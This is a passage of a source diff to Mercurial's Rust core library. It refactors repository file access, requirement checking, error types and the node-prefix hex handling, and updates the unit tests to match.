+ pub fn hg_vfs(&self) -> Vfs<'_> {
Vfs { base: &self.dot_hg }
}
/// For accessing repository store files (in `.hg/store`)
- pub(crate) fn store_vfs(&self) -> Vfs<'_> {
+ pub fn store_vfs(&self) -> Vfs<'_> {
Vfs { base: &self.store }
}
/// For accessing the working copy
-
- // The undescore prefix silences the "never used" warning. Remove before
- // using.
- pub(crate) fn _working_directory_vfs(&self) -> Vfs<'_> {
+ pub fn working_directory_vfs(&self) -> Vfs<'_> {
Vfs {
base: &self.working_directory,
}
}
+
+ pub fn dirstate_parents(
+ &self,
+ ) -> Result<crate::dirstate::DirstateParents, HgError> {
+ let dirstate = self.hg_vfs().mmap_open("dirstate")?;
+ let parents =
+ crate::dirstate::parsers::parse_dirstate_parents(&dirstate)?;
+ Ok(parents.clone())
+ }
}
impl Vfs<'_> {
- pub(crate) fn read(
+ pub fn join(&self, relative_path: impl AsRef<Path>) -> PathBuf {
+ self.base.join(relative_path)
+ }
+
+ pub fn read(
&self,
relative_path: impl AsRef<Path>,
- ) -> std::io::Result<Vec<u8>> {
- std::fs::read(self.base.join(relative_path))
+ ) -> Result<Vec<u8>, HgError> {
+ let path = self.join(relative_path);
+ std::fs::read(&path).when_reading_file(&path)
}
- pub(crate) fn open(
+ pub fn mmap_open(
&self,
relative_path: impl AsRef<Path>,
- ) -> std::io::Result<std::fs::File> {
- std::fs::File::open(self.base.join(relative_path))
+ ) -> Result<Mmap, HgError> {
+ let path = self.base.join(relative_path);
+ let file = std::fs::File::open(&path).when_reading_file(&path)?;
+ // TODO: what are the safety requirements here?
+ let mmap = unsafe { MmapOptions::new().map(&file) }
+ .when_reading_file(&path)?;
+ Ok(mmap)
}
- pub(crate) fn mmap_open(
+ pub fn rename(
&self,
- relative_path: impl AsRef<Path>,
- ) -> std::io::Result<Mmap> {
- let file = self.open(relative_path)?;
- // TODO: what are the safety requirements here?
- let mmap = unsafe { MmapOptions::new().map(&file) }?;
- Ok(mmap)
+ relative_from: impl AsRef<Path>,
+ relative_to: impl AsRef<Path>,
+ ) -> Result<(), HgError> {
+ let from = self.join(relative_from);
+ let to = self.join(relative_to);
+ std::fs::rename(&from, &to)
+ .with_context(|| IoErrorContext::RenamingFile { from, to })
}
}
--- a/rust/hg-core/src/requirements.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/requirements.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,19 +1,9 @@
-use crate::repo::Repo;
-use std::io;
+use crate::errors::{HgError, HgResultExt};
+use crate::repo::{Repo, Vfs};
+use crate::utils::join_display;
+use std::collections::HashSet;
-#[derive(Debug)]
-pub enum RequirementsError {
- // TODO: include a path?
- Io(io::Error),
- /// The `requires` file is corrupted
- Corrupted,
- /// The repository requires a feature that we don't support
- Unsupported {
- feature: String,
- },
-}
-
-fn parse(bytes: &[u8]) -> Result<Vec<String>, ()> {
+fn parse(bytes: &[u8]) -> Result<HashSet<String>, HgError> {
// The Python code reading this file uses `str.splitlines`
// which looks for a number of line separators (even including a couple of
// non-ASCII ones), but Python code writing it always uses `\n`.
@@ -27,16 +17,20 @@
if line[0].is_ascii_alphanumeric() && line.is_ascii() {
Ok(String::from_utf8(line.into()).unwrap())
} else {
- Err(())
+ Err(HgError::corrupted("parse error in 'requires' file"))
}
})
.collect()
}
-pub fn load(repo: &Repo) -> Result<Vec<String>, RequirementsError> {
- match repo.hg_vfs().read("requires") {
- Ok(bytes) => parse(&bytes).map_err(|()| RequirementsError::Corrupted),
+pub(crate) fn load(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> {
+ parse(&hg_vfs.read("requires")?)
+}
+pub(crate) fn load_if_exists(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> {
+ if let Some(bytes) = hg_vfs.read("requires").io_not_found_as_none()? {
+ parse(&bytes)
+ } else {
// Treat a missing file the same as an empty file.
// From `mercurial/localrepo.py`:
// > requires file contains a newline-delimited list of
@@ -44,33 +38,121 @@
// > the repository. This file was introduced in Mercurial 0.9.2,
// > which means very old repositories may not have one. We assume
// > a missing file translates to no requirements.
- Err(error) if error.kind() == std::io::ErrorKind::NotFound => {
- Ok(Vec::new())
- }
-
- Err(error) => Err(RequirementsError::Io(error))?,
+ Ok(HashSet::new())
}
}
-pub fn check(repo: &Repo) -> Result<(), RequirementsError> {
- for feature in load(repo)? {
- if !SUPPORTED.contains(&&*feature) {
- return Err(RequirementsError::Unsupported { feature });
- }
+pub(crate) fn check(repo: &Repo) -> Result<(), HgError> {
+ let unknown: Vec<_> = repo
+ .requirements()
+ .iter()
+ .map(String::as_str)
+ // .filter(|feature| !ALL_SUPPORTED.contains(feature.as_str()))
+ .filter(|feature| {
+ !REQUIRED.contains(feature) && !SUPPORTED.contains(feature)
+ })
+ .collect();
+ if !unknown.is_empty() {
+ return Err(HgError::unsupported(format!(
+ "repository requires feature unknown to this Mercurial: {}",
+ join_display(&unknown, ", ")
+ )));
+ }
+ let missing: Vec<_> = REQUIRED
+ .iter()
+ .filter(|&&feature| !repo.requirements().contains(feature))
+ .collect();
+ if !missing.is_empty() {
+ return Err(HgError::unsupported(format!(
+ "repository is missing feature required by this Mercurial: {}",
+ join_display(&missing, ", ")
+ )));
}
Ok(())
}
-// TODO: set this to actually-supported features
+/// rhg does not support repositories that are *missing* any of these features
+const REQUIRED: &[&str] = &["revlogv1", "store", "fncache", "dotencode"];
+
+/// rhg supports repository with or without these
const SUPPORTED: &[&str] = &[
- "dotencode",
- "fncache",
"generaldelta",
- "revlogv1",
- "sparserevlog",
- "store",
+ SHARED_REQUIREMENT,
+ SHARESAFE_REQUIREMENT,
+ SPARSEREVLOG_REQUIREMENT,
+ RELATIVE_SHARED_REQUIREMENT,
+ REVLOG_COMPRESSION_ZSTD,
// As of this writing everything rhg does is read-only.
// When it starts writing to the repository, it’ll need to either keep the
// persistent nodemap up to date or remove this entry:
- "persistent-nodemap",
+ NODEMAP_REQUIREMENT,
];
+
+// Copied from mercurial/requirements.py:
+
+/// When narrowing is finalized and no longer subject to format changes,
+/// we should move this to just "narrow" or similar.
+#[allow(unused)]
+pub(crate) const NARROW_REQUIREMENT: &str = "narrowhg-experimental";
+
+/// Enables sparse working directory usage
+#[allow(unused)]
+pub(crate) const SPARSE_REQUIREMENT: &str = "exp-sparse";
+
+/// Enables the internal phase which is used to hide changesets instead
+/// of stripping them
+#[allow(unused)]
+pub(crate) const INTERNAL_PHASE_REQUIREMENT: &str = "internal-phase";
+
+/// Stores manifest in Tree structure
+#[allow(unused)]
+pub(crate) const TREEMANIFEST_REQUIREMENT: &str = "treemanifest";
+
+/// Increment the sub-version when the revlog v2 format changes to lock out old
+/// clients.
+#[allow(unused)]
+pub(crate) const REVLOGV2_REQUIREMENT: &str = "exp-revlogv2.1";
+
+/// A repository with the sparserevlog feature will have delta chains that
+/// can spread over a larger span. Sparse reading cuts these large spans into
+/// pieces, so that each piece isn't too big.
+/// Without the sparserevlog capability, reading from the repository could use
+/// huge amounts of memory, because the whole span would be read at once,
+/// including all the intermediate revisions that aren't pertinent for the
+/// chain. This is why once a repository has enabled sparse-read, it becomes
+/// required.
+#[allow(unused)]
+pub(crate) const SPARSEREVLOG_REQUIREMENT: &str = "sparserevlog";
+
+/// A repository with the sidedataflag requirement will allow to store extra
+/// information for revision without altering their original hashes.
+#[allow(unused)]
+pub(crate) const SIDEDATA_REQUIREMENT: &str = "exp-sidedata-flag";
+
+/// A repository with the the copies-sidedata-changeset requirement will store
+/// copies related information in changeset's sidedata.
+#[allow(unused)]
+pub(crate) const COPIESSDC_REQUIREMENT: &str = "exp-copies-sidedata-changeset";
+
+/// The repository use persistent nodemap for the changelog and the manifest.
+#[allow(unused)]
+pub(crate) const NODEMAP_REQUIREMENT: &str = "persistent-nodemap";
+
+/// Denotes that the current repository is a share
+#[allow(unused)]
+pub(crate) const SHARED_REQUIREMENT: &str = "shared";
+
+/// Denotes that current repository is a share and the shared source path is
+/// relative to the current repository root path
+#[allow(unused)]
+pub(crate) const RELATIVE_SHARED_REQUIREMENT: &str = "relshared";
+
+/// A repository with share implemented safely. The repository has different
+/// store and working copy requirements i.e. both `.hg/requires` and
+/// `.hg/store/requires` are present.
+#[allow(unused)]
+pub(crate) const SHARESAFE_REQUIREMENT: &str = "share-safe";
+
+/// A repository that use zstd compression inside its revlog
+#[allow(unused)]
+pub(crate) const REVLOG_COMPRESSION_ZSTD: &str = "revlog-compression-zstd";
--- a/rust/hg-core/src/revlog.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog.rs Tue Apr 20 11:01:06 2021 -0400
@@ -9,7 +9,7 @@
pub mod nodemap;
mod nodemap_docket;
pub mod path_encode;
-pub use node::{Node, NodeError, NodePrefix, NodePrefixRef};
+pub use node::{FromHexError, Node, NodePrefix};
pub mod changelog;
pub mod index;
pub mod manifest;
@@ -35,6 +35,9 @@
#[allow(clippy::unreadable_literal)]
pub const WORKING_DIRECTORY_REVISION: Revision = 0x7fffffff;
+pub const WORKING_DIRECTORY_HEX: &str =
+ "ffffffffffffffffffffffffffffffffffffffff";
+
/// The simplest expression of what we need of Mercurial DAGs.
pub trait Graph {
/// Return the two parents of the given `Revision`.
--- a/rust/hg-core/src/revlog/changelog.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/changelog.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,12 +1,13 @@
+use crate::errors::HgError;
use crate::repo::Repo;
use crate::revlog::revlog::{Revlog, RevlogError};
-use crate::revlog::NodePrefixRef;
use crate::revlog::Revision;
+use crate::revlog::{Node, NodePrefix};
/// A specialized `Revlog` to work with `changelog` data format.
pub struct Changelog {
/// The generic `revlog` format.
- revlog: Revlog,
+ pub(crate) revlog: Revlog,
}
impl Changelog {
@@ -19,7 +20,7 @@
/// Return the `ChangelogEntry` a given node id.
pub fn get_node(
&self,
- node: NodePrefixRef,
+ node: NodePrefix,
) -> Result<ChangelogEntry, RevlogError> {
let rev = self.revlog.get_node_rev(node)?;
self.get_rev(rev)
@@ -33,6 +34,10 @@
let bytes = self.revlog.get_rev_data(rev)?;
Ok(ChangelogEntry { bytes })
}
+
+ pub fn node_from_rev(&self, rev: Revision) -> Option<&Node> {
+ Some(self.revlog.index.get_entry(rev)?.hash())
+ }
}
/// `Changelog` entry which knows how to interpret the `changelog` data bytes.
@@ -53,6 +58,8 @@
/// Return the node id of the `manifest` referenced by this `changelog`
/// entry.
pub fn manifest_node(&self) -> Result<&[u8], RevlogError> {
- self.lines().next().ok_or(RevlogError::Corrupted)
+ self.lines()
+ .next()
+ .ok_or_else(|| HgError::corrupted("empty changelog entry").into())
}
}
--- a/rust/hg-core/src/revlog/index.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/index.rs Tue Apr 20 11:01:06 2021 -0400
@@ -3,6 +3,7 @@
use byteorder::{BigEndian, ByteOrder};
+use crate::errors::HgError;
use crate::revlog::node::Node;
use crate::revlog::revlog::RevlogError;
use crate::revlog::{Revision, NULL_REVISION};
@@ -44,7 +45,8 @@
offsets: Some(offsets),
})
} else {
- Err(RevlogError::Corrupted)
+ Err(HgError::corrupted("unexpected inline revlog length")
+ .into())
}
} else {
Ok(Self {
@@ -298,12 +300,12 @@
// Remaining offset bytes.
bytes.extend(&[0u8; 2]);
} else {
- // Offset is only 6 bytes will usize is 8.
- bytes.extend(&self.offset.to_be_bytes()[2..]);
+ // Offset stored on 48 bits (6 bytes)
+ bytes.extend(&(self.offset as u64).to_be_bytes()[2..]);
}
bytes.extend(&[0u8; 2]); // Revision flags.
- bytes.extend(&self.compressed_len.to_be_bytes()[4..]);
- bytes.extend(&self.uncompressed_len.to_be_bytes()[4..]);
+ bytes.extend(&(self.compressed_len as u32).to_be_bytes());
+ bytes.extend(&(self.uncompressed_len as u32).to_be_bytes());
bytes.extend(&self.base_revision.to_be_bytes());
bytes
}
--- a/rust/hg-core/src/revlog/manifest.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/manifest.rs Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
use crate::repo::Repo;
use crate::revlog::revlog::{Revlog, RevlogError};
-use crate::revlog::NodePrefixRef;
+use crate::revlog::NodePrefix;
use crate::revlog::Revision;
use crate::utils::hg_path::HgPath;
@@ -20,7 +20,7 @@
/// Return the `ManifestEntry` of a given node id.
pub fn get_node(
&self,
- node: NodePrefixRef,
+ node: NodePrefix,
) -> Result<ManifestEntry, RevlogError> {
let rev = self.revlog.get_node_rev(node)?;
self.get_rev(rev)
--- a/rust/hg-core/src/revlog/node.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/node.rs Tue Apr 20 11:01:06 2021 -0400
@@ -8,8 +8,10 @@
//! In Mercurial code base, it is customary to call "a node" the binary SHA
//! of a revision.
-use hex::{self, FromHex, FromHexError};
+use crate::errors::HgError;
+use bytes_cast::BytesCast;
use std::convert::{TryFrom, TryInto};
+use std::fmt;
/// The length in bytes of a `Node`
///
@@ -29,6 +31,9 @@
/// see also `NODES_BYTES_LENGTH` about it being private.
const NODE_NYBBLES_LENGTH: usize = 2 * NODE_BYTES_LENGTH;
+/// Default for UI presentation
+const SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH: u8 = 12;
+
/// Private alias for readability and to ease future change
type NodeData = [u8; NODE_BYTES_LENGTH];
@@ -45,11 +50,10 @@
/// if they need a loop boundary.
///
/// All methods that create a `Node` either take a type that enforces
-/// the size or fail immediately at runtime with [`ExactLengthRequired`].
+/// the size or return an error at runtime.
///
/// [`nybbles_len`]: #method.nybbles_len
-/// [`ExactLengthRequired`]: struct.NodeError#variant.ExactLengthRequired
-#[derive(Clone, Debug, PartialEq)]
+#[derive(Copy, Clone, Debug, PartialEq, BytesCast, derive_more::From)]
#[repr(transparent)]
pub struct Node {
data: NodeData,
@@ -60,32 +64,49 @@
data: [0; NODE_BYTES_LENGTH],
};
-impl From<NodeData> for Node {
- fn from(data: NodeData) -> Node {
- Node { data }
+/// Return an error if the slice has an unexpected length
+impl<'a> TryFrom<&'a [u8]> for &'a Node {
+ type Error = ();
+
+ #[inline]
+ fn try_from(bytes: &'a [u8]) -> Result<Self, Self::Error> {
+ match Node::from_bytes(bytes) {
+ Ok((node, rest)) if rest.is_empty() => Ok(node),
+ _ => Err(()),
+ }
}
}
/// Return an error if the slice has an unexpected length
-impl<'a> TryFrom<&'a [u8]> for &'a Node {
+impl TryFrom<&'_ [u8]> for Node {
type Error = std::array::TryFromSliceError;
#[inline]
- fn try_from(bytes: &'a [u8]) -> Result<&'a Node, Self::Error> {
+ fn try_from(bytes: &'_ [u8]) -> Result<Self, Self::Error> {
let data = bytes.try_into()?;
- // Safety: `#[repr(transparent)]` makes it ok to "wrap" the target
- // of a reference to the type of the single field.
- Ok(unsafe { std::mem::transmute::<&NodeData, &Node>(data) })
+ Ok(Self { data })
}
}
-#[derive(Debug, PartialEq)]
-pub enum NodeError {
- ExactLengthRequired(usize, String),
- PrefixTooLong(String),
- HexError(FromHexError, String),
+impl From<&'_ NodeData> for Node {
+ #[inline]
+ fn from(data: &'_ NodeData) -> Self {
+ Self { data: *data }
+ }
}
+impl fmt::LowerHex for Node {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ for &byte in &self.data {
+ write!(f, "{:02x}", byte)?
+ }
+ Ok(())
+ }
+}
+
+#[derive(Debug)]
+pub struct FromHexError;
+
/// Low level utility function, also for prefixes
fn get_nybble(s: &[u8], i: usize) -> u8 {
if i % 2 == 0 {
@@ -117,18 +138,26 @@
///
/// To be used in FFI and I/O only, in order to facilitate future
/// changes of hash format.
- pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, NodeError> {
- Ok(NodeData::from_hex(hex.as_ref())
- .map_err(|e| NodeError::from((e, hex)))?
- .into())
+ pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, FromHexError> {
+ let prefix = NodePrefix::from_hex(hex)?;
+ if prefix.nybbles_len() == NODE_NYBBLES_LENGTH {
+ Ok(Self { data: prefix.data })
+ } else {
+ Err(FromHexError)
+ }
}
- /// Convert to hexadecimal string representation
+ /// `from_hex`, but for input from an internal file of the repository such
+ /// as a changelog or manifest entry.
///
- /// To be used in FFI and I/O only, in order to facilitate future
- /// changes of hash format.
- pub fn encode_hex(&self) -> String {
- hex::encode(self.data)
+ /// An error is treated as repository corruption.
+ pub fn from_hex_for_repo(hex: impl AsRef<[u8]>) -> Result<Node, HgError> {
+ Self::from_hex(hex.as_ref()).map_err(|FromHexError| {
+ HgError::CorruptedRepository(format!(
+ "Expected a full hexadecimal node ID, found {}",
+ String::from_utf8_lossy(hex.as_ref())
+ ))
+ })
}
/// Provide access to binary data
@@ -138,17 +167,11 @@
pub fn as_bytes(&self) -> &[u8] {
&self.data
}
-}
-impl<T: AsRef<[u8]>> From<(FromHexError, T)> for NodeError {
- fn from(err_offender: (FromHexError, T)) -> Self {
- let (err, offender) = err_offender;
- let offender = String::from_utf8_lossy(offender.as_ref()).into_owned();
- match err {
- FromHexError::InvalidStringLength => {
- NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, offender)
- }
- _ => NodeError::HexError(err, offender),
+ pub fn short(&self) -> NodePrefix {
+ NodePrefix {
+ nybbles_len: SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH,
+ data: self.data,
}
}
}
@@ -158,10 +181,14 @@
/// Since it can potentially come from an hexadecimal representation with
/// odd length, it needs to carry around whether the last 4 bits are relevant
/// or not.
-#[derive(Debug, PartialEq)]
+#[derive(Debug, PartialEq, Copy, Clone)]
pub struct NodePrefix {
- buf: Vec<u8>,
- is_odd: bool,
+ /// In `1..=NODE_NYBBLES_LENGTH`
+ nybbles_len: u8,
+ /// The first `4 * length_in_nybbles` bits are used (considering bits
+ /// within a bytes in big-endian: most significant first), the rest
+ /// are zero.
+ data: NodeData,
}
impl NodePrefix {
@@ -172,72 +199,42 @@
///
/// To be used in FFI and I/O only, in order to facilitate future
/// changes of hash format.
- pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, NodeError> {
+ pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, FromHexError> {
let hex = hex.as_ref();
let len = hex.len();
- if len > NODE_NYBBLES_LENGTH {
- return Err(NodeError::PrefixTooLong(
- String::from_utf8_lossy(hex).to_owned().to_string(),
- ));
+ if len > NODE_NYBBLES_LENGTH || len == 0 {
+ return Err(FromHexError);
}
- let is_odd = len % 2 == 1;
- let even_part = if is_odd { &hex[..len - 1] } else { hex };
- let mut buf: Vec<u8> =
- Vec::from_hex(&even_part).map_err(|e| (e, hex))?;
-
- if is_odd {
- let latest_char = char::from(hex[len - 1]);
- let latest_nybble = latest_char.to_digit(16).ok_or_else(|| {
- (
- FromHexError::InvalidHexCharacter {
- c: latest_char,
- index: len - 1,
- },
- hex,
- )
- })? as u8;
- buf.push(latest_nybble << 4);
+ let mut data = [0; NODE_BYTES_LENGTH];
+ let mut nybbles_len = 0;
+ for &ascii_byte in hex {
+ let nybble = match char::from(ascii_byte).to_digit(16) {
+ Some(digit) => digit as u8,
+ None => return Err(FromHexError),
+ };
+ // Fill in the upper half of a byte first, then the lower half.
+ let shift = if nybbles_len % 2 == 0 { 4 } else { 0 };
+ data[nybbles_len as usize / 2] |= nybble << shift;
+ nybbles_len += 1;
}
- Ok(NodePrefix { buf, is_odd })
+ Ok(Self { data, nybbles_len })
}
- pub fn borrow(&self) -> NodePrefixRef {
- NodePrefixRef {
- buf: &self.buf,
- is_odd: self.is_odd,
- }
- }
-}
-
-#[derive(Clone, Debug, PartialEq)]
-pub struct NodePrefixRef<'a> {
- buf: &'a [u8],
- is_odd: bool,
-}
-
-impl<'a> NodePrefixRef<'a> {
- pub fn len(&self) -> usize {
- if self.is_odd {
- self.buf.len() * 2 - 1
- } else {
- self.buf.len() * 2
- }
- }
-
- pub fn is_empty(&self) -> bool {
- self.len() == 0
+ pub fn nybbles_len(&self) -> usize {
+ self.nybbles_len as _
}
pub fn is_prefix_of(&self, node: &Node) -> bool {
- if self.is_odd {
- let buf = self.buf;
- let last_pos = buf.len() - 1;
- node.data.starts_with(buf.split_at(last_pos).0)
- && node.data[last_pos] >> 4 == buf[last_pos] >> 4
- } else {
- node.data.starts_with(self.buf)
+ let full_bytes = self.nybbles_len() / 2;
+ if self.data[..full_bytes] != node.data[..full_bytes] {
+ return false;
}
+ if self.nybbles_len() % 2 == 0 {
+ return true;
+ }
+ let last = self.nybbles_len() - 1;
+ self.get_nybble(last) == node.get_nybble(last)
}
/// Retrieve the `i`th half-byte from the prefix.
@@ -245,8 +242,12 @@
/// This is also the `i`th hexadecimal digit in numeric form,
/// also called a [nybble](https://en.wikipedia.org/wiki/Nibble).
pub fn get_nybble(&self, i: usize) -> u8 {
- assert!(i < self.len());
- get_nybble(self.buf, i)
+ assert!(i < self.nybbles_len());
+ get_nybble(&self.data, i)
+ }
+
+ fn iter_nybbles(&self) -> impl Iterator<Item = u8> + '_ {
+ (0..self.nybbles_len()).map(move |i| get_nybble(&self.data, i))
}
/// Return the index first nybble that's different from `node`
@@ -257,42 +258,49 @@
///
/// Returned index is as in `get_nybble`, i.e., starting at 0.
pub fn first_different_nybble(&self, node: &Node) -> Option<usize> {
- let buf = self.buf;
- let until = if self.is_odd {
- buf.len() - 1
- } else {
- buf.len()
- };
- for (i, item) in buf.iter().enumerate().take(until) {
- if *item != node.data[i] {
- return if *item & 0xf0 == node.data[i] & 0xf0 {
- Some(2 * i + 1)
- } else {
- Some(2 * i)
- };
- }
+ self.iter_nybbles()
+ .zip(NodePrefix::from(*node).iter_nybbles())
+ .position(|(a, b)| a != b)
+ }
+}
+
+impl fmt::LowerHex for NodePrefix {
+ fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
+ let full_bytes = self.nybbles_len() / 2;
+ for &byte in &self.data[..full_bytes] {
+ write!(f, "{:02x}", byte)?
}
- if self.is_odd && buf[until] & 0xf0 != node.data[until] & 0xf0 {
- Some(until * 2)
- } else {
- None
+ if self.nybbles_len() % 2 == 1 {
+ let last = self.nybbles_len() - 1;
+ write!(f, "{:x}", self.get_nybble(last))?
+ }
+ Ok(())
+ }
+}
+
+/// A shortcut for full `Node` references
+impl From<&'_ Node> for NodePrefix {
+ fn from(node: &'_ Node) -> Self {
+ NodePrefix {
+ nybbles_len: node.nybbles_len() as _,
+ data: node.data,
}
}
}
/// A shortcut for full `Node` references
-impl<'a> From<&'a Node> for NodePrefixRef<'a> {
- fn from(node: &'a Node) -> Self {
- NodePrefixRef {
- buf: &node.data,
- is_odd: false,
+impl From<Node> for NodePrefix {
+ fn from(node: Node) -> Self {
+ NodePrefix {
+ nybbles_len: node.nybbles_len() as _,
+ data: node.data,
}
}
}
-impl PartialEq<Node> for NodePrefixRef<'_> {
+impl PartialEq<Node> for NodePrefix {
fn eq(&self, other: &Node) -> bool {
- !self.is_odd && self.buf == other.data
+ Self::from(*other) == *self
}
}
@@ -300,18 +308,16 @@
mod tests {
use super::*;
- fn sample_node() -> Node {
- let mut data = [0; NODE_BYTES_LENGTH];
- data.copy_from_slice(&[
+ const SAMPLE_NODE_HEX: &str = "0123456789abcdeffedcba9876543210deadbeef";
+ const SAMPLE_NODE: Node = Node {
+ data: [
0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef, 0xfe, 0xdc, 0xba,
0x98, 0x76, 0x54, 0x32, 0x10, 0xde, 0xad, 0xbe, 0xef,
- ]);
- data.into()
- }
+ ],
+ };
/// Pad an hexadecimal string to reach `NODE_NYBBLES_LENGTH`
- ///check_hash
- /// The padding is made with zeros
+ /// The padding is made with zeros.
pub fn hex_pad_right(hex: &str) -> String {
let mut res = hex.to_string();
while res.len() < NODE_NYBBLES_LENGTH {
@@ -320,135 +326,88 @@
res
}
- fn sample_node_hex() -> String {
- hex_pad_right("0123456789abcdeffedcba9876543210deadbeef")
- }
-
#[test]
fn test_node_from_hex() {
- assert_eq!(Node::from_hex(&sample_node_hex()), Ok(sample_node()));
-
- let mut short = hex_pad_right("0123");
- short.pop();
- short.pop();
- assert_eq!(
- Node::from_hex(&short),
- Err(NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, short)),
- );
-
- let not_hex = hex_pad_right("012... oops");
- assert_eq!(
- Node::from_hex(¬_hex),
- Err(NodeError::HexError(
- FromHexError::InvalidHexCharacter { c: '.', index: 3 },
- not_hex,
- )),
- );
+ let not_hex = "012... oops";
+ let too_short = "0123";
+ let too_long = format!("{}0", SAMPLE_NODE_HEX);
+ assert_eq!(Node::from_hex(SAMPLE_NODE_HEX).unwrap(), SAMPLE_NODE);
+ assert!(Node::from_hex(not_hex).is_err());
+ assert!(Node::from_hex(too_short).is_err());
+ assert!(Node::from_hex(&too_long).is_err());
}
#[test]
fn test_node_encode_hex() {
- assert_eq!(sample_node().encode_hex(), sample_node_hex());
+ assert_eq!(format!("{:x}", SAMPLE_NODE), SAMPLE_NODE_HEX);
}
#[test]
- fn test_prefix_from_hex() -> Result<(), NodeError> {
- assert_eq!(
- NodePrefix::from_hex("0e1")?,
- NodePrefix {
- buf: vec![14, 16],
- is_odd: true
- }
- );
+ fn test_prefix_from_to_hex() -> Result<(), FromHexError> {
+ assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1")?), "0e1");
+ assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1a")?), "0e1a");
assert_eq!(
- NodePrefix::from_hex("0e1a")?,
- NodePrefix {
- buf: vec![14, 26],
- is_odd: false
- }
+ format!("{:x}", NodePrefix::from_hex(SAMPLE_NODE_HEX)?),
+ SAMPLE_NODE_HEX
);
-
- // checking limit case
- let node_as_vec = sample_node().data.iter().cloned().collect();
- assert_eq!(
- NodePrefix::from_hex(sample_node_hex())?,
- NodePrefix {
- buf: node_as_vec,
- is_odd: false
- }
- );
-
Ok(())
}
#[test]
fn test_prefix_from_hex_errors() {
- assert_eq!(
- NodePrefix::from_hex("testgr"),
- Err(NodeError::HexError(
- FromHexError::InvalidHexCharacter { c: 't', index: 0 },
- "testgr".to_string()
- ))
- );
- let mut long = NULL_NODE.encode_hex();
+ assert!(NodePrefix::from_hex("testgr").is_err());
+ let mut long = format!("{:x}", NULL_NODE);
long.push('c');
- match NodePrefix::from_hex(&long)
- .expect_err("should be refused as too long")
- {
- NodeError::PrefixTooLong(s) => assert_eq!(s, long),
- err => panic!(format!("Should have been TooLong, got {:?}", err)),
- }
+ assert!(NodePrefix::from_hex(&long).is_err())
}
#[test]
- fn test_is_prefix_of() -> Result<(), NodeError> {
+ fn test_is_prefix_of() -> Result<(), FromHexError> {
let mut node_data = [0; NODE_BYTES_LENGTH];
node_data[0] = 0x12;
node_data[1] = 0xca;
let node = Node::from(node_data);
- assert!(NodePrefix::from_hex("12")?.borrow().is_prefix_of(&node));
- assert!(!NodePrefix::from_hex("1a")?.borrow().is_prefix_of(&node));
- assert!(NodePrefix::from_hex("12c")?.borrow().is_prefix_of(&node));
- assert!(!NodePrefix::from_hex("12d")?.borrow().is_prefix_of(&node));
+ assert!(NodePrefix::from_hex("12")?.is_prefix_of(&node));
+ assert!(!NodePrefix::from_hex("1a")?.is_prefix_of(&node));
+ assert!(NodePrefix::from_hex("12c")?.is_prefix_of(&node));
+ assert!(!NodePrefix::from_hex("12d")?.is_prefix_of(&node));
Ok(())
}
#[test]
- fn test_get_nybble() -> Result<(), NodeError> {
+ fn test_get_nybble() -> Result<(), FromHexError> {
let prefix = NodePrefix::from_hex("dead6789cafe")?;
- assert_eq!(prefix.borrow().get_nybble(0), 13);
- assert_eq!(prefix.borrow().get_nybble(7), 9);
+ assert_eq!(prefix.get_nybble(0), 13);
+ assert_eq!(prefix.get_nybble(7), 9);
Ok(())
}
#[test]
fn test_first_different_nybble_even_prefix() {
let prefix = NodePrefix::from_hex("12ca").unwrap();
- let prefref = prefix.borrow();
let mut node = Node::from([0; NODE_BYTES_LENGTH]);
- assert_eq!(prefref.first_different_nybble(&node), Some(0));
+ assert_eq!(prefix.first_different_nybble(&node), Some(0));
node.data[0] = 0x13;
- assert_eq!(prefref.first_different_nybble(&node), Some(1));
+ assert_eq!(prefix.first_different_nybble(&node), Some(1));
node.data[0] = 0x12;
- assert_eq!(prefref.first_different_nybble(&node), Some(2));
+ assert_eq!(prefix.first_different_nybble(&node), Some(2));
node.data[1] = 0xca;
// now it is a prefix
- assert_eq!(prefref.first_different_nybble(&node), None);
+ assert_eq!(prefix.first_different_nybble(&node), None);
}
#[test]
fn test_first_different_nybble_odd_prefix() {
let prefix = NodePrefix::from_hex("12c").unwrap();
- let prefref = prefix.borrow();
let mut node = Node::from([0; NODE_BYTES_LENGTH]);
- assert_eq!(prefref.first_different_nybble(&node), Some(0));
+ assert_eq!(prefix.first_different_nybble(&node), Some(0));
node.data[0] = 0x13;
- assert_eq!(prefref.first_different_nybble(&node), Some(1));
+ assert_eq!(prefix.first_different_nybble(&node), Some(1));
node.data[0] = 0x12;
- assert_eq!(prefref.first_different_nybble(&node), Some(2));
+ assert_eq!(prefix.first_different_nybble(&node), Some(2));
node.data[1] = 0xca;
// now it is a prefix
- assert_eq!(prefref.first_different_nybble(&node), None);
+ assert_eq!(prefix.first_different_nybble(&node), None);
}
}
--- a/rust/hg-core/src/revlog/nodemap.rs Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/hg-core/src/revlog/nodemap.rs Tue Apr 20 11:01:06 2021 -0400
@@ -13,31 +13,23 @@
//! is used in a more abstract context.
use super::{
- node::NULL_NODE, Node, NodeError, NodePrefix, NodePrefixRef, Revision,
- RevlogIndex, NULL_REVISION,
